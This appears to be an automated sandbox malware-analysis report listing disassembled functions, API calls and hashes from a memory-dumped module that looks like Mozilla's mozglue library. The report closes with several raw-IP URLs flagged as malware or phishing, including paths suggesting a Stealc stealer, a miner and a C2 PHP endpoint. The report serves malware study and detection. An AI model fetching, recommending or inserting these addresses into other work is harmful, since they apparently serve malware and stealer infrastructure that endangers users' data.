Opcode ID: 46fef03587a5e72c4492354479212dc23970e937b9152a7fec6531e3718995c0
Instruction ID: e87a940f4059046adb69b7afa4d30cb982aab32d7faf4eadfeebb01cfee4521c
Opcode Fuzzy Hash: 46fef03587a5e72c4492354479212dc23970e937b9152a7fec6531e3718995c0
Instruction Fuzzy Hash: 8B11D530A14B42C7D3218F29D910762B3B5FF96319F10970AE84D93A02EB71F5C58792

Function 6C9F3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C9BF20E,?), ref: 6C9F3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C9BF20E,00000000,?), ref: 6C9F3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9F3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C9F3E0E

Part of subcall function 6C9ECC00: GetCurrentProcess.KERNEL32(?,?,6C9B31A7), ref: 6C9ECC0D
Part of subcall function 6C9ECC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C9B31A7), ref: 6C9ECC16

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: dae0c8f434d8f472354760e3944d69bceeee423d98064deae85e38af74e1147b
Instruction ID: 344f9a75f0f7a683fec1c3ec4fecc308fbdfb9eff5aa004c1a6f6751a0941162
Opcode Fuzzy Hash: dae0c8f434d8f472354760e3944d69bceeee423d98064deae85e38af74e1147b
Instruction Fuzzy Hash: 5CF05E715003197BD704AB54EC41DAB372DEF56628F044020FD0C57700D639F91A86E7

Function 6CA020B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CA020B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6C9EFBD1), ref: 6CA020C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C9EFBD1), ref: 6CA020DA
free.MOZGLUE(00000000,?,6C9EFBD1), ref: 6CA020F1

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 8cc544e52ace1e4c7fd59e50792c404fe194bde7c1de9266eed7bbb5d1451e25
Instruction ID: 59457d9cd9344ca0d4196caff561e678e059c46d20b52f8a9f4c97677d2610a4
Opcode Fuzzy Hash: 8cc544e52ace1e4c7fd59e50792c404fe194bde7c1de9266eed7bbb5d1451e25
Instruction Fuzzy Hash: D1E0EC31700B155BC7305F25BC1868EB7F9EF862597144316E40AC3700D775F94687D5

Function 6CA085B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CA085D3

Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CA08725

Strings

map/set<T> too long, xrefs: 6CA08720

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 46e04d95943d1e10143d78c7d841989dd4d91082a5f9cef4fbc3b9baa0adefe7
Instruction ID: be296b4dcd5a4d1e188535fee08ce4e5df314275fcb9751a6757e16d678fb7f6
Opcode Fuzzy Hash: 46e04d95943d1e10143d78c7d841989dd4d91082a5f9cef4fbc3b9baa0adefe7
Instruction Fuzzy Hash: A4516674600641CFD701CF18D184A96BBF1BF4A358F1AC18AD8595BB52C335E885CF96

Function 6C9BBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C9BBDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C9BBE8F

Strings

0, xrefs: 6C9BBE5B

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 4eb367a5406ca9bb3cf8342e93db04bf6a6fe59c7ca5d25541b18066b702a911
Instruction ID: 66e1b74c64468bc6fc78b7b4c60f94a8e3f1fe167f2aa67ecfa707c7a819116a
Opcode Fuzzy Hash: 4eb367a5406ca9bb3cf8342e93db04bf6a6fe59c7ca5d25541b18066b702a911
Instruction Fuzzy Hash: 60419171909745EFC711CF38C4C1A9BB7F4AF9A348F008A1DF985A7661D730D9598B82

Function 6C9F3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9F3D19
mozalloc_abort.MOZGLUE(?), ref: 6C9F3D6C

Strings

d, xrefs: 6C9F3D58

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 1a62f269609e59894836d8e298911c4e9be286a643195ec7c6e2d9292dca38f9
Instruction ID: 553e3f849e8de22f7f4854f71edfbdd02af7bbc5504f9a16707a65230a006702
Opcode Fuzzy Hash: 1a62f269609e59894836d8e298911c4e9be286a643195ec7c6e2d9292dca38f9
Instruction Fuzzy Hash: 32110431E047899BDB048B69CC144FDB779FFAA318B48D318DC5997602EB34E986C7A1

Function 6C9C4730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C9C44B2,6CA3E21C,6CA3F7F8), ref: 6C9C473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C9C474A

Strings

GetNtLoaderAPI, xrefs: 6C9C4744

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: a298a75bebdb20d16855a6a7e72777d2a9a27e00a9af0208690ee5022e67d2de
Instruction ID: 97db9ea7801fbad4ecd2dd190f8bfdec9eddff12b27c1839e11734315467703e
Opcode Fuzzy Hash: a298a75bebdb20d16855a6a7e72777d2a9a27e00a9af0208690ee5022e67d2de
Instruction Fuzzy Hash: 140192753003158FDF18AFA99C586297BB9EB9B715B048069EE09C7340CB74D8028F92

Function 6CA16DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CA16E22
__Init_thread_footer.LIBCMT ref: 6CA16E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6CA16E1D

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: abc1c822e617bc3cbee2eb00ae373b1ac04d9fe14890a1a96c47de10c4fb0bea
Instruction ID: 10356be5b688228000c183b238b28d88e7603d9e36e508067db0fce8029ce566
Opcode Fuzzy Hash: abc1c822e617bc3cbee2eb00ae373b1ac04d9fe14890a1a96c47de10c4fb0bea
Instruction Fuzzy Hash: 09F0F6353083C18FDB149668CC70ED13771A723218F08429AD809C6FB1D720E587CA62

Function 6C9C9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C9C9EEF

Strings

Infinity, xrefs: 6C9C9EB7
NaN, xrefs: 6C9C9EC1

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 2fcca526c39ef9009160cab413dbef6d500f227b548bf36aa4801849bc48875a
Instruction ID: b0e76e43943c63560710865dad35faf10484c416d417906de1090d133bba51cd
Opcode Fuzzy Hash: 2fcca526c39ef9009160cab413dbef6d500f227b548bf36aa4801849bc48875a
Instruction Fuzzy Hash: 8AF0D170320342CEDB268B08EC2DB903371B72734CF15869ED90C8BA50D735A5878A82

Function 6C9CBED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C9CBEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C9CBEF5

Strings

cryptbase.dll, xrefs: 6C9CBEF0

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 9538eda5d04f032a2a18fe1533e3b51fb658ce15ffcb5ef83ee31f859d6469bd
Instruction ID: 656a759b969b23bb31e33d9b07de884e9898aa8bf3fed4552f0755843862d6b6
Opcode Fuzzy Hash: 9538eda5d04f032a2a18fe1533e3b51fb658ce15ffcb5ef83ee31f859d6469bd
Instruction Fuzzy Hash: 16D0A732284608EBD714AA649C15B153B79A701715F20C020F309C4891C7B1D451CB92

Function 6C9B50E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C9B4E9C,?,?,?,?,?), ref: 6C9B510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C9B4E9C,?,?,?,?,?), ref: 6C9B5167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C9B5196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C9B4E9C), ref: 6C9B5234

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: 62c1e7399946e688952d1309bfb94936d58cd9a32245c9ef01a2bc879d10a171
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: 9291C135905656DFCB14CF08C490A5ABBA5FF89318B28858CDC58AB715D372FD82CBE0

Function 6C9F08F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9F0918
LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9F09A6
EnterCriticalSection.KERNEL32(6CA3E7DC,?,00000000), ref: 6C9F09F3
LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9F0ACB

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 828bbc602e7b839743640ebee4a5f5f95ec8ff959eea907848eac43103447bb1
Instruction ID: 2ab3e565592968d4cf8e14176449cbd67cbc2df70f66a239e467e34b49372668
Opcode Fuzzy Hash: 828bbc602e7b839743640ebee4a5f5f95ec8ff959eea907848eac43103447bb1
Instruction Fuzzy Hash: A9511836705755CBEB1C9A19D82866673BEEB81B24724912ADD79D7F80D730EC4387C0

Function 6CA0B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CA0B2C9,?,?,?,6CA0B127,?,?,?,?,?,?,?,?,?,6CA0AE52), ref: 6CA0B628

Part of subcall function 6CA090E0: free.MOZGLUE(?,00000000,?,?,6CA0DEDB), ref: 6CA090FF
Part of subcall function 6CA090E0: free.MOZGLUE(?,00000000,?,?,6CA0DEDB), ref: 6CA09108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CA0B2C9,?,?,?,6CA0B127,?,?,?,?,?,?,?,?,?,6CA0AE52), ref: 6CA0B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CA0B2C9,?,?,?,6CA0B127,?,?,?,?,?,?,?,?,?,6CA0AE52), ref: 6CA0B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CA0B127,?,?,?,?,?,?,?,?), ref: 6CA0B74D

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: cd134e67466ab0167147fe009fc77c5bf6745556a7fd9b1591b988d87b2cff5c
Instruction ID: 95792cc0caddbe13db0513f6d9c49249def2d754371695dc13c923f09a0c0213
Opcode Fuzzy Hash: cd134e67466ab0167147fe009fc77c5bf6745556a7fd9b1591b988d87b2cff5c
Instruction Fuzzy Hash: BB51D271B023168FDB14CF18FA8069EB7B1FF45389F05862DC85AA7700D731A884CB91

Function 6CA0DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C9FFF2A), ref: 6CA0DFFD

Part of subcall function 6CA090E0: free.MOZGLUE(?,00000000,?,?,6CA0DEDB), ref: 6CA090FF
Part of subcall function 6CA090E0: free.MOZGLUE(?,00000000,?,?,6CA0DEDB), ref: 6CA09108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C9FFF2A), ref: 6CA0E04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C9FFF2A), ref: 6CA0E0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C9FFF2A), ref: 6CA0E0FE

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 4c64a4fdbfcd71ee0701cfc39938c8a8ffe775c1c40f3e6323c7c38674d505c2
Instruction ID: fa3fb3e7daca67cc6ad247faf1776dc9473cbc981a755bcf3c6733f7eb227767
Opcode Fuzzy Hash: 4c64a4fdbfcd71ee0701cfc39938c8a8ffe775c1c40f3e6323c7c38674d505c2
Instruction Fuzzy Hash: 4A41D2B17442168FEB14CF68E89035A73B2BB4634CF184939D596DBB40E731E985CBD2

Function 6CA06E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CA06EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CA06EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CA06F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA06F5C

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 528f5da9b9682e9ecdeb2a9b633d15e1f14c173150000a0aa69bd1176a42437f
Instruction ID: 4345304294967c1a6952cadf6c77a1204ed4c0869506462779da06d99710d669
Opcode Fuzzy Hash: 528f5da9b9682e9ecdeb2a9b633d15e1f14c173150000a0aa69bd1176a42437f
Instruction Fuzzy Hash: 6831B271B1060A8FEB14CF2CDD806AA73F9AB8534CF548639D81AC7651EB31E6D98790

Function 6CA1B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C9C0A4D), ref: 6CA1B5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C9C0A4D), ref: 6CA1B623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C9C0A4D), ref: 6CA1B66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C9C0A4D), ref: 6CA1B67F

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 7a13623448f17cbb755fb4b486b9a168536711d4e4e38e3d891e1ec00b6cbf11
Instruction ID: 18ccede73ff134ba4b2d17ec30356db5d59719f9a0ef7d444d83955fa663f529
Opcode Fuzzy Hash: 7a13623448f17cbb755fb4b486b9a168536711d4e4e38e3d891e1ec00b6cbf11
Instruction Fuzzy Hash: A331F6B1A042268FDB10CF59DC4469AB7B6FF81304F1A8769C81ADBB01DB31E955CBA0

Function 6C9EF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C9EF611
memcpy.VCRUNTIME140(?,?,?), ref: 6C9EF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C9EF652
memcpy.VCRUNTIME140(?,?,?), ref: 6C9EF668

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: ab7972a6018ce8abbe697e6a6818b8499f878c4261a61f3ea213d168397e2821
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 9A316171A002149FD725CF1DDCC0AABB7B9EFD8358B188539FA498BB04D631E984CB90

Function 6CA026B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA026C1
free.MOZGLUE(?), ref: 6CA026E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA026FF
free.MOZGLUE ref: 6CA0270D

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 17e0d79c72cf23687326422390c40c949084f6519854ed09bc1d3aa2d7351377
Instruction ID: d86d0de120ad167d8d1e46bb9cb2aad098fac81c4862ca51a5e8e374232d8584
Opcode Fuzzy Hash: 17e0d79c72cf23687326422390c40c949084f6519854ed09bc1d3aa2d7351377
Instruction Fuzzy Hash: E5F049B67003016BE7009F08ECC498BB3ADEF5129DB144231EA0AD3B01E331F859C7A2

Source: http://77.91.77.81/mine/amadka.exe	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exeer	Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dllpk	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/	Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php	Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll:-	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php-	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/EM32	Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/	Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php.	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe506iN	Avira URL Cloud: Label: phishing
